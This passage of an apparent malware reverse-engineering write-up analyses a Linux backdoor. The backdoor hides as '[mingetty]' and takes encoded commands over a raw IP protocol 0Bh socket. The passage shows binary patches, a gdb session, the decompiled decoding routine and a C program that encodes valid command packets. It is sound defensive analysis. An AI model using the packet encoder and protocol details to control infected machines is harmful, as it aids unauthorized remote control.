But first we see what else the application does. After opening the socket it ignores (by calling signal(xxx,SIG_IGN)) the signals SIGHUP (1), SIGTERM (0Fh) and SIGCHLD (11h). It sets some pointer variables to point where they have to and then does:
"register esi" = recv ( var_mainSD, &var_Buf, 2048, 0);
Once this is done it does three checks on the received data;
If any of these conditions fails it goes to the end of a big loop where it does a "usleep(10000)" and goes back to the "recv" call we have already seen.
Once the checks are satisfied, it calls a function with the following parameters:
decrypt_function ( esi-16h, var_BufDat2Ptr, var_2ndBufPtr);
Knowing that;
We can deduce that this function will probably transform all the bytes received in var_Buf.data, from the 3rd element to the end, and leave the results of that transformation in "var_2ndBuf". Knowing the kind of binary we're talking about and (because it was announced in the challenge) that it has an "encryption" mechanism, we can be quite sure that this is the "decrypt_function".
After this transformation is done, the second byte of var_2ndBuf is used for a "case" statement with 12 different cases. So this byte has to have a value between 1 and 12 to execute one of the cases. If the value is outside this range the binary will jump to the default case, where (as we've seen before) it will "usleep(10000)" before going back to the "recv" call.
So to wrap up, the structure of the main function is approximately as follows:
main (int argc, char* argv[])
{
  INIT_VARIABLES;
  if ( geteuid() != 0 ) error_exit(-1);
  SET (argv[0] = "[mingetty]");
  signal ( SIGCHLD, SIG_IGN );
  if ( fork() != 0 ) error_exit(0);
  setsid();
  signal ( SIGCHLD, SIG_IGN );
  if ( fork() != 0 ) error_exit(0);
  chdir("/");
  close (stdin); close (stdout); close (stderr);
  INIT_MORE_VARS;
  strange_function ( time() );
  var_mainSD = socket (AF_INET, SOCK_RAW, 0x0B);
  signal ( SIGHUP, SIG_IGN );
  signal ( SIGTERM, SIG_IGN );
  signal ( SIGCHLD, SIG_IGN );
  INIT_EVEN_MORE_VARS;
  for (;;) {
    bytes_recv = recv (var_mainSD, &var_Buf, 2048, 0);
    /* the byte at offset 09h of the packet is the "protocol" field of iphdr */
    if ((var_Buf.hdr.protocol == 0x0B) && (var_Buf.data[0] == 2) && (bytes_recv > 200)) {
      decrypt_function ( bytes_recv - 0x16, &(var_Buf.data[2]), &var_2ndBuf );
      switch ( var_2ndBuf[1] ) {
        case 1 : //SOMETHING
        case 2 : ..(etc).. up to
        case 12: //SOMETHING
          break;
        default : ;
      }
    }
    usleep(10000);
  }
}
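The test at the top of the loop can be written down as a small predicate, which is useful later for checking hand-made packets before feeding them to the binary. This is a sketch under one assumption: that the header byte being compared with 0Bh is the one at offset 09h (the "protocol" field of our iphdr structure), which is the byte set to 0b in the test packet dump. All names are hypothetical.

```python
IP_HEADER_LEN = 0x14          # fixed 20-byte header, as in the iphdr structure
PROTOCOL_OFFSET = 0x09        # assumed position of the byte compared with 0Bh
EXPECTED_PROTOCOL = 0x0B
EXPECTED_FIRST_DATA_BYTE = 0x02
MIN_RECEIVED = 200            # the packet must be longer than this


def passes_checks(packet):
    """Return True if `packet` would get past the three tests in the main loop."""
    return (len(packet) > MIN_RECEIVED
            and packet[PROTOCOL_OFFSET] == EXPECTED_PROTOCOL
            and packet[IP_HEADER_LEN] == EXPECTED_FIRST_DATA_BYTE)


def encrypted_payload(packet):
    """Return the bytes handed to decrypt_function: data[2:], len(packet) - 0x16 bytes."""
    return packet[IP_HEADER_LEN + 2:]
```

The length of encrypted_payload() matches the "esi-16h" argument: 14h bytes of header plus the two leading data bytes are skipped.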
Now it would be nice to check all our assumptions. It would be good to see the execution of the binary providing some input that satisfies the first 3 checks and see what happens with the input provided (and what the decrypt_function does). But to do that we have to first solve a pending problem.
The pending problem is the one we left open earlier with "socket" and "socketcall". We focus again on the code related to the "socket" and "recv" functions;
    .text:0804825C    push 0Bh
    .text:0804825E    push 3
    .text:08048260    push 2
    .text:08048262    call socket
    .text:08048267    mov  [ebp+var_mainSD], eax
    :
    :
    .text:080482B0    push 0
    .text:080482B2    push 800h
    .text:080482B7    lea  eax, [ebp+var_Buf]
    .text:080482BD    push eax
    .text:080482BE    mov  ecx, [ebp+var_mainSD]
    .text:080482C4    push ecx
    .text:080482C5    call recv
As we've seen, this translates to;
    var_mainSD = socket (AF_INET, SOCK_RAW, 0x0b);
    :
    recv (var_mainSD, &var_Buf, 2048, 0);
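So the problem is that we cannot open a raw socket and later read information from it. One quick patch comes to mind. We know that the binary closes the standard file descriptors (standard input, output and error) earlier on. The solution could be to use the standard input to "recv" the information.
For that we patch three more places in the binary: we stop it from closing stdin, we replace the call to "socket" with an "xor ax,ax" so that the descriptor it stores is 0, and we make main() call "read" instead of "recv".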
So our new "prepare-patch" script now looks like;
    #!/bin/sh
    if [ "$1" = "" ] ; then
        echo "Output filename missing";
        exit 1;
    fi
    cp the-binary-dressed $1
    # Run without being root
    echo '0000182: 75' | xxd -r - $1
    # Switch behaviour of parent and child on first fork
    echo '00001DF: 75' | xxd -r - $1
    # Switch behaviour of parent and child on second fork
    echo '0000200: 75' | xxd -r - $1
    # Avoid closing STDIN
    echo '0000218: 9090 9090 90' | xxd -r - $1
    # Substitute socket call for a xor ax,ax
    echo '0000262: 6631 c090 90' | xxd -r - $1
    # Read instead of recv on main()
    echo '00002C6: 42F0' | xxd -r - $1
After applying it we're ready to send "packets" through the standard input and move forward.
Let's try our patch. We will generate a packet consisting of 256 bytes with the consecutive values from 0 to 255 (use your preferred way to produce such a file). We will modify the bytes at offsets 09h and 14h so that it complies with the 3 checks we have seen before.
The prepared packet looks like this;
    [tstusr@sandbox reverse]$ xxd tstpacket
    0000000: 0001 0203 0405 0607 080b 0a0b 0c0d 0e0f  ................
    0000010: 1011 1213 0215 1617 1819 1a1b 1c1d 1e1f  ................
    0000020: 2021 2223 2425 2627 2829 2a2b 2c2d 2e2f   !"#$%&'()*+,-./
    0000030: 3031 3233 3435 3637 3839 3a3b 3c3d 3e3f  0123456789:;<=>?
    0000040: 4041 4243 4445 4647 4849 4a4b 4c4d 4e4f  @ABCDEFGHIJKLMNO
    0000050: 5051 5253 5455 5657 5859 5a5b 5c5d 5e5f  PQRSTUVWXYZ[\]^_
    0000060: 6061 6263 6465 6667 6869 6a6b 6c6d 6e6f  `abcdefghijklmno
    0000070: 7071 7273 7475 7677 7879 7a7b 7c7d 7e7f  pqrstuvwxyz{|}~.
    0000080: 8081 8283 8485 8687 8889 8a8b 8c8d 8e8f  ................
    0000090: 9091 9293 9495 9697 9899 9a9b 9c9d 9e9f  ................
    00000a0: a0a1 a2a3 a4a5 a6a7 a8a9 aaab acad aeaf  ................
    00000b0: b0b1 b2b3 b4b5 b6b7 b8b9 babb bcbd bebf  ................
    00000c0: c0c1 c2c3 c4c5 c6c7 c8c9 cacb cccd cecf  ................
    00000d0: d0d1 d2d3 d4d5 d6d7 d8d9 dadb dcdd dedf  ................
    00000e0: e0e1 e2e3 e4e5 e6e7 e8e9 eaeb eced eeef  ................
    00000f0: f0f1 f2f3 f4f5 f6f7 f8f9 fafb fcfd feff  ................
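One possible way to produce this file is sketched below. It is only an illustration: the function names (build_test_packet, passes_checks, write_test_packet) are our own and do not come from the binary. The offsets are the ones visible in the dump, 09h for the header byte that must be 0Bh and 14h for the first data byte that must be 2.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

#define PKT_LEN 256

/* Fill buf with the values 0..255, then patch the two bytes main() inspects. */
void build_test_packet(unsigned char buf[PKT_LEN])
{
    assert(buf != NULL);
    for (size_t i = 0; i < PKT_LEN; i++)
        buf[i] = (unsigned char)i;
    buf[0x09] = 0x0b;   /* header byte compared against 0Bh */
    buf[0x14] = 0x02;   /* first data byte, must be 2       */
}

/* The three checks from main(): header byte, first data byte, length > 200. */
int passes_checks(const unsigned char *buf, size_t len)
{
    return len > 200 && buf[0x09] == 0x0b && buf[0x14] == 0x02;
}

/* Hypothetical helper: write the packet to a file. Returns 0 on success. */
int write_test_packet(const char *path)
{
    unsigned char buf[PKT_LEN];
    FILE *f = fopen(path, "wb");
    if (f == NULL)
        return -1;
    build_test_packet(buf);
    size_t written = fwrite(buf, 1, sizeof buf, f);
    if (fclose(f) != 0 || written != sizeof buf)
        return -1;
    return 0;
}
```

Calling write_test_packet("tstpacket") should give a file equivalent to the one shown in the xxd output.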
Now we have everything ready to run another test on the application. This time we will execute it under "gdb" and stop right after the call to the "decrypt_function";
    [tstusr@sandbox reverse]$ gdb the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN
    GNU gdb 5.0rh-5 Red Hat Linux 7.1
    Copyright 2001 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB. Type "show warranty" for details.
    This GDB was configured as "i386-redhat-linux"...(no debugging symbols found)...
    (gdb) break *0x08048311
    Breakpoint 1 at 0x8048311
    (gdb) run < tstpacket
    Starting program: /home/tstusr/reverse/the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN < tstpacket
    warning: shared library handler failed to enable breakpoint

    Breakpoint 1, 0x08048311 in ?? ()
    (gdb)
Now we look at the two buffers passed to the function. To do it we disassemble the call with its parameters to find out where exactly the buffers are.
    (gdb) disassemble 0x080482fa 0x08048311
    Dump of assembler code from 0x80482fa to 0x8048311:
    0x80482fa: mov 0xffffbb20(%ebp),%edx
    0x8048300: push %edx
    0x8048301: mov 0xffffbb28(%ebp),%ecx
    0x8048307: push %ecx
    0x8048308: lea 0xffffffea(%esi),%eax
    0x804830b: push %eax
    0x804830c: call 0x804a1e8
    End of assembler dump.
    (gdb) x/w (0xffffbb28+$ebp)
    0xbfffb63c: 0xbffff32a
    (gdb) x/100hb 0xbffff32a
    0xbffff32a: 0x16 0x17 0x18 0x19 0x1a 0x1b 0x1c 0x1d
    0xbffff332: 0x1e 0x1f 0x20 0x21 0x22 0x23 0x24 0x25
    0xbffff33a: 0x26 0x27 0x28 0x29 0x2a 0x2b 0x2c 0x2d
    0xbffff342: 0x2e 0x2f 0x30 0x31 0x32 0x33 0x34 0x35
    0xbffff34a: 0x36 0x37 0x38 0x39 0x3a 0x3b 0x3c 0x3d
    0xbffff352: 0x3e 0x3f 0x40 0x41 0x42 0x43 0x44 0x45
    0xbffff35a: 0x46 0x47 0x48 0x49 0x4a 0x4b 0x4c 0x4d
    0xbffff362: 0x4e 0x4f 0x50 0x51 0x52 0x53 0x54 0x55
    0xbffff36a: 0x56 0x57 0x58 0x59 0x5a 0x5b 0x5c 0x5d
    0xbffff372: 0x5e 0x5f 0x60 0x61 0x62 0x63 0x64 0x65
    0xbffff37a: 0x66 0x67 0x68 0x69 0x6a 0x6b 0x6c 0x6d
    0xbffff382: 0x6e 0x6f 0x70 0x71 0x72 0x73 0x74 0x75
    0xbffff38a: 0x76 0x77 0x78 0x79
    (gdb) x/w (0xffffbb20+$ebp)
    0xbfffb634: 0xbfffeb14
    (gdb) x/100hb 0xbfffeb14
    0xbfffeb14: 0xff 0xea 0xea 0xea 0xea 0xea 0xea 0xea
    0xbfffeb1c: 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xea
    0xbfffeb24: 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xea
    0xbfffeb2c: 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xea
    0xbfffeb34: 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xea
    0xbfffeb3c: 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xea
    0xbfffeb44: 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xea
    0xbfffeb4c: 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xea
    0xbfffeb54: 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xea
    0xbfffeb5c: 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xea
    0xbfffeb64: 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xea
    0xbfffeb6c: 0xea 0xea 0xea 0xea 0xea 0xea 0xea 0xea
    0xbfffeb74: 0xea 0xea 0xea 0xea
    (gdb)
As expected, the first buffer is our prepared packet starting at offset 16h. The surprising result is that the second buffer comes back with a value of 255 (or -1) followed by all the bytes set to 234 (or -22).
If we repeat the test stopping the execution before the call we see that the second buffer is filled with 0's, while afterwards it again has 255 in its first byte followed by exactly 234 bytes set to 234.
This means that var_2ndBuf[1] equals 234, which obviously falls outside the range of valid options for the "case" statement. So we have to move on to our next step.
We will need to disassemble the "decrypt_function" to find out how we have to "encrypt" the "packets" we send.
To do this we start with the assembly of the function with the variables renamed (as we did in our "main" function). We then go step by step, adding comments on what we can see the assembly code doing. This brings us to the following commented assembly code;
    Decrypt_Packet  proc near               ; CODE XREF: main+1D8

    var_10          = byte ptr -10h
    var_LocBuffPtr  = dword ptr -4
    arg_length      = dword ptr  8
    arg_source      = dword ptr  0Ch
    arg_dest        = dword ptr  10h

                    push ebp
                    mov ebp, esp
                    sub esp, 4
                    push edi
                    push esi
                    push ebx
                    mov edi, [ebp+arg_length]
                    lea ebx, [edi-1]        ; ebx = ArgSize-1
                    lea eax, [edi+3]        ; eax = ArgSize+3
                    and al, 0FCh            ; eax = ArgSize Rounded up to *4
                    sub esp, eax            ; We allocate arg_size rounded
                                            ; bytes on the stack
                    mov [ebp+var_LocBuffPtr], esp
                    mov al, ds:gZero
                    mov esi, [ebp+arg_dest]
                    mov [esi], al           ; dest[0]=gZero
                    test ebx, ebx
                    jl EmptyBuffer          ; if (ArgSize-1<0) goto ...

    repeat:                                 ; CODE XREF: Decrypt_Packet+AD
                    lea edx, [ebx-1]        ; edx = ebx - 1
                    test ebx, ebx
                    jz short last_char      ; if (ebx==0)
                    mov esi, [ebp+arg_source]
                    movzx eax, byte ptr [ebx+esi]
                    movzx edx, byte ptr [edx+esi]
                    sub eax, edx            ; eax = source[ebx]-source[ebx-1]
                    jmp short not_last_char
    ; ---------------------------------------------------------------------------
                    align 4

    last_char:                              ; CODE XREF: Decrypt_Packet+31
                    mov esi, [ebp+arg_source]
                    movzx eax, byte ptr [esi] ; eax=source[0]

    not_last_char:                          ; CODE XREF: Decrypt_Packet+40
                    lea ecx, [eax-17h]      ; ecx = eax - 17h
                    test ecx, ecx
                    jge short more_thn_17
                    lea esi, [esi+0]

    weird_loop???:                          ; CODE XREF: Decrypt_Packet+5A
                    add ecx, 100h
                    js short weird_loop???

    more_thn_17:                            ; CODE XREF: Decrypt_Packet+4F
                    xor edx, edx
                    cmp edx, edi            ; cmp argSize,0
                    jge short none_left
                    lea esi, [esi]

    for_loop:                               ; CODE XREF: Decrypt_Packet+73
                    mov esi, [ebp+arg_dest]
                    mov al, [edx+esi]       ; al=dest[edx]
                    mov esi, [ebp+var_LocBuffPtr]
                    mov [edx+esi], al       ; locBuf[dx]=dest[dx]
                    inc edx
                    cmp edx, edi            ; for (dx=0;dx<di;dx++)
                                            ;   locBuff[dx]=Dest[dx]
                    jl short for_loop

    none_left:                              ; CODE XREF: Decrypt_Packet+60
                    mov esi, [ebp+arg_dest]
                    mov [esi], cl           ; dest[0]=cl
                    mov edx, 1
                    cmp edx, edi            ; cmp edi,1
                    jge short one_left
                    nop

    scndFor_loop:                           ; CODE XREF: Decrypt_Packet+94
                    mov esi, [ebp+var_LocBuffPtr]
                    mov al, [edx+esi-1]
                    mov esi, [ebp+arg_dest]
                    mov [edx+esi], al       ; dest[edx]=locBuff[edx-1]
                    inc edx
                    cmp edx, edi            ; for (edx=1;edx<edi;edx++)
                                            ;   dest[edx]=locBuf[edx-1]
                    jl short scndFor_loop

    one_left:                               ; CODE XREF: Decrypt_Packet+81
                    mov esi, [ebp+var_LocBuffPtr]
                    push esi
                    push ecx
                    push offset aCS         ; "%c%s"
                    mov esi, [ebp+arg_dest]
                    push esi
                    call asprintf___err___errx___fprintf___sprintf___sscanf___syslog
                    add esp, 10h
                    dec ebx
                    jns repeat              ; repeat until all processed

    EmptyBuffer:                            ; CODE XREF: Decrypt_Packet+26
                    lea esp, [ebp+var_10]
                    pop ebx
                    pop esi
                    pop edi
                    mov esp, ebp
                    pop ebp
                    retn
    Decrypt_Packet  endp
Now that we have it all commented, we try to transform it into some kind of pseudo-C code to get a better view of what is done. We end up with something like this;
    function Decrypt_packet (int size, char *source, char *dest)
    {
        char LocBuff[2048]; //"Dynamically" allocated in the buffer
        char *LocBuffPtr;
        int index;

        LocBuffPtr = LocBuff;
        dest[0] = Global3
        index = ArgSize - 1;
        while (index>=0) {
            if (index==0)
                ch = source[0];
            else
                ch = source[index] - source[index-1];
            ch = ch - 17h;
            for (tmp=0;tmp<argSize;tmp++)
                locbuff[tmp]=dest[tmp];
            dest[0]=ch;
            for (tmp=1;tmp<argSize;tmp++)
                dest[tmp]=locbuff[tmp-1];
            sprintf ( dest, "%c%s", ch, locbuff );
            index--;
        }
    }
Now we can see that the algorithm is an extremely inefficient (and quite difficult to reverse-engineer) version of the following algorithm;
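    void Decrypt_packet (int size, const char *source, char *dest)
    {
        int index;

        if (size <= 0) return;              /* nothing to decode */
        dest[0] = source[0] - 0x17;
        for (index = 1; index < size; index++) {
            /* difference with the previous byte, minus 17h */
            dest[index] = source[index] - source[index-1] - 0x17;
        }
    }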
If we look at the result of Decrypt_packet() applied to our "test" packet, we see immediately that it is the one we got. The fact that each byte is replaced by its difference with the previous one minus 17h is the reason why we got all those "234" values; the difference was always 1, and 1-17h=-16h, which in a byte is represented as EAh (100h-16h) or 234.
The fact that the algorithm was coded so strangely makes us think that it may have been written that way just to hinder reverse-engineering. The other option is that the programmer wasn't good at programming and was just a "script kiddie", but given the advanced topics covered in this binary and the coding of the rest of the application, this option doesn't seem probable.
So now we know how the decryption process works, and we can work on preparing a new "packet" that goes through all the tests and jumps to the "case" statement that we want!
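The arithmetic can be checked with a small sketch. The function below is our own rendering of the simplified algorithm using unsigned bytes, so that the wrap-around modulo 256 is explicit; the name decrypt_packet and the use of unsigned char are our choices, not something taken from the binary. For the test packet the first source byte is 16h, so the first result is 16h-17h=-1, stored as FFh, and every following result is 1-17h=-16h, stored as EAh.

```c
#include <assert.h>
#include <stddef.h>

/* Direct form of the decoding: each output byte is the difference between
 * the current and the previous input byte, minus 17h, modulo 256.
 * The first byte has no predecessor, so 0 is used in its place. */
void decrypt_packet(size_t size, const unsigned char *source, unsigned char *dest)
{
    assert(source != NULL && dest != NULL);
    for (size_t i = 0; i < size; i++) {
        unsigned char prev = (i == 0) ? 0 : source[i - 1];
        dest[i] = (unsigned char)(source[i] - prev - 0x17);
    }
}
```

Feeding it the bytes 16h, 17h, 18h, ... reproduces the FFh followed by a run of EAh that gdb showed in the second buffer.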
To do that we prepare a simple program that prepares a "packet" with one "command" or "case value" to jump to.
    #include <unistd.h>
    #include <stdlib.h>

    /* 20 header bytes plus the first 3 data bytes:
       offset 9 = 0Bh and offset 20 = 2 satisfy the checks in main() */
    unsigned char header[0x17]={1,2,3,4,5,6,7,8,9,0xb,11,12,13,14,15,16,
                                17,18,19,20,0x2,22,00}; //includes 1st data byte

    int main(int argc, char** argv)
    {
        unsigned char ch,prev;
        unsigned char command;

        if (argc < 2) return(1);            //command number missing
        command = atoi(argv[1]);

        //Write header
        write(1,header,sizeof(header));

        //Write "encoded" Command
        ch = command + 0x17;
        write(1,&ch,1);
        prev = ch;

        //Write encoded data (stop on end of file or read error)
        while (read(0,&ch,1) == 1) {
            ch = prev + ch + 0x17;
            write(1,&ch,1);
            prev = ch;
        }
        return(0);
    }
Now we can prepare a "command-packet" using a "payload" file named 256bytes.dat consisting of the values from 0 to FFh consecutively;
    [tstusr@sandbox reverse]$ gcc -Wall -o encrypt encrypt.c
    [tstusr@sandbox reverse]$ ./encrypt 1 <256bytes.dat >command1.pkt
We can now check with gdb that everything works. We'll use this "command1.pkt" to see if we really jump to "case 1". For that we start gdb, set a breakpoint just after the "movzx eax,[ebp+var_2ndBuf+1]" and check whether eax has a value of "1".
    [tstusr@sandbox reverse]$ gdb the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN
    GNU gdb 5.0rh-5 Red Hat Linux 7.1
    Copyright 2001 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB. Type "show warranty" for details.
    This GDB was configured as "i386-redhat-linux"...(no debugging symbols found)...
    (gdb) break *0x804831b
    Breakpoint 1 at 0x804831b
    (gdb) run < command1.pkt
    Starting program: /home/tstusr/reverse/the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN < command1.pkt
    warning: shared library handler failed to enable breakpoint

    Breakpoint 1, 0x0804831b in ?? ()
    (gdb) info registers eax
    eax            0x1      1
    (gdb)
We can also check that our 256 bytes of payload have arrived perfectly;
    (gdb) x/258hb 0xbfffeb14
    0xbfffeb14: 0xe9 0x01 0x00 0x01 0x02 0x03 0x04 0x05
    0xbfffeb1c: 0x06 0x07 0x08 0x09 0x0a 0x0b 0x0c 0x0d
    0xbfffeb24: 0x0e 0x0f 0x10 0x11 0x12 0x13 0x14 0x15
    0xbfffeb2c: 0x16 0x17 0x18 0x19 0x1a 0x1b 0x1c 0x1d
    0xbfffeb34: 0x1e 0x1f 0x20 0x21 0x22 0x23 0x24 0x25
    0xbfffeb3c: 0x26 0x27 0x28 0x29 0x2a 0x2b 0x2c 0x2d
    0xbfffeb44: 0x2e 0x2f 0x30 0x31 0x32 0x33 0x34 0x35
    0xbfffeb4c: 0x36 0x37 0x38 0x39 0x3a 0x3b 0x3c 0x3d
    0xbfffeb54: 0x3e 0x3f 0x40 0x41 0x42 0x43 0x44 0x45
    0xbfffeb5c: 0x46 0x47 0x48 0x49 0x4a 0x4b 0x4c 0x4d
    0xbfffeb64: 0x4e 0x4f 0x50 0x51 0x52 0x53 0x54 0x55
    0xbfffeb6c: 0x56 0x57 0x58 0x59 0x5a 0x5b 0x5c 0x5d
    0xbfffeb74: 0x5e 0x5f 0x60 0x61 0x62 0x63 0x64 0x65
    0xbfffeb7c: 0x66 0x67 0x68 0x69 0x6a 0x6b 0x6c 0x6d
    0xbfffeb84: 0x6e 0x6f 0x70 0x71 0x72 0x73 0x74 0x75
    0xbfffeb8c: 0x76 0x77 0x78 0x79 0x7a 0x7b 0x7c 0x7d
    0xbfffeb94: 0x7e 0x7f 0x80 0x81 0x82 0x83 0x84 0x85
    0xbfffeb9c: 0x86 0x87 0x88 0x89 0x8a 0x8b 0x8c 0x8d
    0xbfffeba4: 0x8e 0x8f 0x90 0x91 0x92 0x93 0x94 0x95
    0xbfffebac: 0x96 0x97 0x98 0x99 0x9a 0x9b 0x9c 0x9d
    0xbfffebb4: 0x9e 0x9f 0xa0 0xa1 0xa2 0xa3 0xa4 0xa5
    0xbfffebbc: 0xa6 0xa7 0xa8 0xa9 0xaa 0xab 0xac 0xad
    0xbfffebc4: 0xae 0xaf 0xb0 0xb1 0xb2 0xb3 0xb4 0xb5
    0xbfffebcc: 0xb6 0xb7 0xb8 0xb9 0xba 0xbb 0xbc 0xbd
    0xbfffebd4: 0xbe 0xbf 0xc0 0xc1 0xc2 0xc3 0xc4 0xc5
    0xbfffebdc: 0xc6 0xc7 0xc8 0xc9 0xca 0xcb 0xcc 0xcd
    0xbfffebe4: 0xce 0xcf 0xd0 0xd1 0xd2 0xd3 0xd4 0xd5
    0xbfffebec: 0xd6 0xd7 0xd8 0xd9 0xda 0xdb 0xdc 0xdd
    0xbfffebf4: 0xde 0xdf 0xe0 0xe1 0xe2 0xe3 0xe4 0xe5
    0xbfffebfc: 0xe6 0xe7 0xe8 0xe9 0xea 0xeb 0xec 0xed
    0xbfffec04: 0xee 0xef 0xf0 0xf1 0xf2 0xf3 0xf4 0xf5
    0xbfffec0c: 0xf6 0xf7 0xf8 0xf9 0xfa 0xfb 0xfc 0xfd
    0xbfffec14: 0xfe 0xff
The first byte is the last 00 that we had on the "header" of our application, and the second is the command itself. After that come our 256 bytes exactly as we had them before going through our "encrypt" program.
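The same round trip can be reproduced in memory, without the binary. The sketch below is an assumption-laden restatement of our "encrypt" program: encode_command and decode_at are hypothetical names, and the leading 00 stands for the last byte of the header, which is the first byte the decryption sees. Decoding that 00 gives 00h-17h=E9h, the command byte is encoded as 17h plus the command, and each payload byte is added to the previous encoded byte plus 17h.

```c
#include <assert.h>
#include <stddef.h>

/* Encode a command byte followed by n payload bytes.
 * out must have room for n + 2 bytes; returns the number of bytes written. */
size_t encode_command(unsigned char command, const unsigned char *payload,
                      size_t n, unsigned char *out)
{
    unsigned char prev = 0x00;  /* last header byte, first byte to be decoded */
    size_t k = 0;

    assert(out != NULL && (payload != NULL || n == 0));
    out[k++] = prev;
    prev = (unsigned char)(prev + command + 0x17);
    out[k++] = prev;
    for (size_t i = 0; i < n; i++) {
        prev = (unsigned char)(prev + payload[i] + 0x17);
        out[k++] = prev;
    }
    return k;
}

/* Decode byte i of an encoded buffer with the difference rule. */
unsigned char decode_at(const unsigned char *enc, size_t i)
{
    unsigned char prev = (i == 0) ? 0 : enc[i - 1];
    return (unsigned char)(enc[i] - prev - 0x17);
}
```

With command 1 and the 256-byte payload, decode_at yields E9h, then 01h, then the payload bytes unchanged, which matches the memory dump.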
We can also provide the binary with more than one packet. We have to consider the fact that our "recv" will in fact read at most 2048 bytes of stdin. So if we want to provide more than 1 packet we just have to make sure that all the packets are 2048 bytes in length (except the last that can be any size).
We will do it by preparing an input file with one "command 1" and one "command 2" packet.
    [tstusr@sandbox reverse]$ ./encrypt 2 <256bytes.dat >command2.pkt
    [tstusr@sandbox reverse]$ cp command1.pkt command1.2048.pkt
    [tstusr@sandbox reverse]$ echo '00007ff: 00'| xxd -r - command1.2048.pkt
    [tstusr@sandbox reverse]$ cp command2.pkt command2.2048.pkt
    [tstusr@sandbox reverse]$ echo '00007ff: 00'| xxd -r - command2.2048.pkt
    [tstusr@sandbox reverse]$ ls -l command?.2048.pkt
    -rw-rw-r--    1 tstusr   tstusr       2048 May 30 01:25 command1.2048.pkt
    -rw-rw-r--    1 tstusr   tstusr       2048 May 30 01:25 command2.2048.pkt
    [tstusr@sandbox reverse]$ cat command1.2048.pkt command2.2048.pkt > command1-2.pkt
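The padding step can also be done programmatically. The following is a minimal sketch, assuming that zero bytes are an acceptable filler (which is what the xxd trick above produces); append_padded and RECV_SIZE are names we made up for the illustration. Each packet is copied into the output and padded so that it occupies exactly one 2048-byte slot, the amount a single read will consume.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define RECV_SIZE 2048  /* size requested by the recv/read call in main() */

/* Copy pkt into out at offset out_len and zero-pad it to a full RECV_SIZE slot.
 * Returns the new length of out, or 0 if the packet is too long or the
 * output buffer has no room for another slot. */
size_t append_padded(unsigned char *out, size_t out_len, size_t out_cap,
                     const unsigned char *pkt, size_t pkt_len)
{
    assert(out != NULL && pkt != NULL);
    if (pkt_len > RECV_SIZE || out_len > out_cap || out_cap - out_len < RECV_SIZE)
        return 0;
    memcpy(out + out_len, pkt, pkt_len);
    memset(out + out_len + pkt_len, 0, RECV_SIZE - pkt_len);
    return out_len + RECV_SIZE;
}
```

This version pads every packet, including the last one, which is harmless but not required.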
Now we can test that effectively we read two packets and that both "jump" to their corresponding "case" statement with gdb;
    [tstusr@sandbox reverse]$ gdb the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN
    GNU gdb 5.0rh-5 Red Hat Linux 7.1
    Copyright 2001 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB. Type "show warranty" for details.
    This GDB was configured as "i386-redhat-linux"...(no debugging symbols found)...
    (gdb) break *0x804831b
    Breakpoint 1 at 0x804831b
    (gdb) run < command1-2.pkt
    Starting program: /home/tstusr/reverse/the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN < command1-2.pkt
    warning: shared library handler failed to enable breakpoint

    Breakpoint 1, 0x0804831b in ?? ()
    (gdb) info registers eax
    eax            0x1      1
    (gdb) cont
    Continuing.

    Breakpoint 1, 0x0804831b in ?? ()
    (gdb) info registers eax
    eax            0x2      2
    (gdb)
All good! We have checked that BOTH packets have been read and that the "command" has arrived at its destination. The question that arises now is; what has happened inside the "case 1"? And what would happen if we instruct gdb to "cont" again?
One thing worth mentioning here is that while doing all these tests we've had our sniffer up and running all the time and it hasn't registered any activity coming from the binary.
It's time to find out its capabilities.
To do this we proceed in a similar way to how we reverse-engineered the decryption function. We start from the assembler code with as many variables identified and as many comments as possible, and try to end up with a pseudo-C code that allows us to understand what the 12 "cases" or "commands" do. The result is as follows;
    case1:
        var_Buf.hdr.ihl_version = 0;
        var_Buf.hdr.ihl_version = gDouble1;
        var_Buf.hdr.TOS = 1;
        var_Buf.hdr.len = 7;
        if (gPID2 == 0)
            var_Buf.hdr.len+1 = 0;
        else {
            var_Buf.hdr.len+1 = 1;
            var_Buf.hdr.id = g_LastCommand;
        }
        Encrypt_Packet (400, &var_Buf, &var_2ndBuf);
        fun1 ( var_AddrPtr, &var_2ndBuf, 400 + (rand??_caller() mod 201));
        break;

    case2:
        gWord2_0_or_2 = var_2ndBuf[2];
        gbdaddr = var_Buf.hdr.daddr;
        randomize??(time(0));
        esi=0;
        edi=rand??_caller mod 10;
        for (ebx=0; ebx<=9; ebx++) {
            if (ebx!=edi) {
                if (gWord2_0_or_2 == 2) {
                    var_Addr[esi..esi+3]=var_2ndBuf[ebx*4+3..ebx*4+6]
                } else {
                    var_Addr[esi..esi+3]=byte(SOMEWEIRDRANDOMVALUE);
                }//if (gWord2_0_or_2==2)
            } //if (ebx!=edi)
            esi +=4 ;
        }
        if (gWord2_0_or_2 != 2) {
            if (gWord2_0_or_2 != 0) edi=0;
            edi = edi*4;
            var_0Value? = edi;
            var_Addr[edi] = var_2ndBuf[3..6];
        }
        break;
        //Fills the "var_Addr[10]" array. It's an array of 10 addresses
